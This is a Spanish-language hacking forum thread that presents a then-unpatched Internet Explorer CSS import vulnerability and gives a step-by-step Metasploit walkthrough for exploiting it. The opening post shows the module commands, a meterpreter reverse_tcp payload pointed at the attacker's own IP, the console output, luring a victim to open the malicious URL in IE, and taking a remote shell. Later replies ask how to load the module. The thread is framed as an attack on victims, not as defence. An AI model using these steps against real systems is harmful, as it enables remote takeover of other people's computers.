Esta vulnerabilidad es nueva y todavía no es parchada oficialmente por el equipo de Microsoft.

Exploit en Ruby:

Mostrar/Ocultar

Descargar código del exploit: [Enlace externo eliminado para invitados]

Los que entiendan Ruby lo pueden analizar y les recomiendo que lo lean y jueguen con él así se entretendrán un rato intentando entenderlo al 100%.

Si quieren de verdad meterse en el mundo del "hacking" si es que se le puede llamar así, tienen que aprender a programar y a entender todo tipo de códigos, en especial perl y ruby (sin mencionar los que si o si tienen que saber como HTML y PHP). Bueno, y para todos aquellos que lo quieren todo facilito y sin perder tiempo intentando entender las cosas, está Metasploit.

Partimos Metasploit y ejecutamos svn update para que se actualice y descargue el exploit que usaremos aquí:

Código: Seleccionar todo

ms11_xxx_ie_css_import.
Luego desde Metasploit hacemos lo siguiente:

Código: Seleccionar todo

msf > use exploit/windows/browser/ms11_xxx_ie_css_import
msf exploit (ms11_xxx_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit (ms11_xxx_ie_css_import) > set SRVHOST 200.152.251.123
SRVHOST => 200.152.251.123
msf exploit (ms11_xxx_ie_css_import) > set LHOST 200.152.251.123
LHOST => 200.152.251.123
msf exploit (ms11_xxx_ie_css_import) > exploit
[+] Exploit running as background job.
[+] Started reverse handler on 200.152.251.123:4444
[+] Using URL: http://200.152.251.123:8080/WrwOMjN
Donde:
use exploit/windows/browser/ms11_xxx_ie_css_import (Definimos el exploit que vamos a usar)
set PAYLOAD windows/meterpreter/reverse_tcp (Definimos el Payload que usaremos)
set SRVHOST 200.152.251.123 (IP local donde va a montar el servicio, o sea la nuestra)
set LHOST 200.152.251.123 (IP adonde se conectará el remoto, o sea la nuestra)
exploit (echamos a correr el exploit)

Bueno, lo importante de esto es la url que nos tira metasploit:

Código: Seleccionar todo

http://200.152.251.123:8080/WrwOMjN
Esa Url se le tiene que enviar a nuestro remoto y obligatoriamente tiene que abrirla con IE.

Cuando abra la URL aparecerán un montón de secuencias como esto:

Código: Seleccionar todo

[+] Spawning a notepad.exe host process...
[+] Migrating into ID 4435

msf exploit (ms11_xxx_ie_css_import) >
Todo OK, ahora verificamos si nuestro remoto cayo:

Código: Seleccionar todo

msf exploit (ms11_xxx_ie_css_import) > sessions 1
Si aparece una sesión significa que nuestro remoto cayó y ahora nos queda conectarnos a ella:

Código: Seleccionar todo

msf exploit (ms11_xxx_ie_css_import) > sessions -i 1
Y luego pueden ejecutar cualquiera de estos 2 comandos:

Código: Seleccionar todo

msf exploit (ms11_xxx_ie_css_import) > shell

msf exploit (ms11_xxx_ie_css_import) > execute -f cmd.exe -H -i
Saludos!
Welcome to your nightmare, bitch.
Gracias por traerlo y te tengo que decir que muy bien explicado y razón tienes que primero tenemos que aprender a entender el código
Salu2!
Imagen

(cuanto más sabes, más cuenta te das de lo poco que sabes).

Mostrar/Ocultar

Perfecto, me ha venido a flor de piel.

Ahora la pregunta del 2010:

· Cuando me descargo el Exploit este, como lo meto en el metas? Hice svn update pero no encontro nada, y cuando escribo el nombre del exploit no lo detecta

Saludos
Imagen


Aprendiendo C/C++ 5%...


Arrasa con lo que veas, y generoso no seas.
TRiGuNZ escribió:Perfecto, me ha venido a flor de piel.

Ahora la pregunta del 2010:

· Cuando me descargo el Exploit este, como lo meto en el metas? Hice svn update pero no encontro nada, y cuando escribo el nombre del exploit no lo detecta

Saludos
Buenas, después de hacer el svn update basta con teclear en la consola de metasploit:

Código: Seleccionar todo

use exploit/windows/browser/ms11_xxx_ie_css_import
&' con eso empieza la diversión, Saludos!
Welcome to your nightmare, bitch.
Si ahora ya tengo una shell te doy 20 euros lo prometo de verdad
RapidShare.de will permanently shut down the servers on 1. March 2010! nein ..
PD:Policia española psicópata
∩____∩
| (• ◡•)|
Responder

Volver a “Exploits”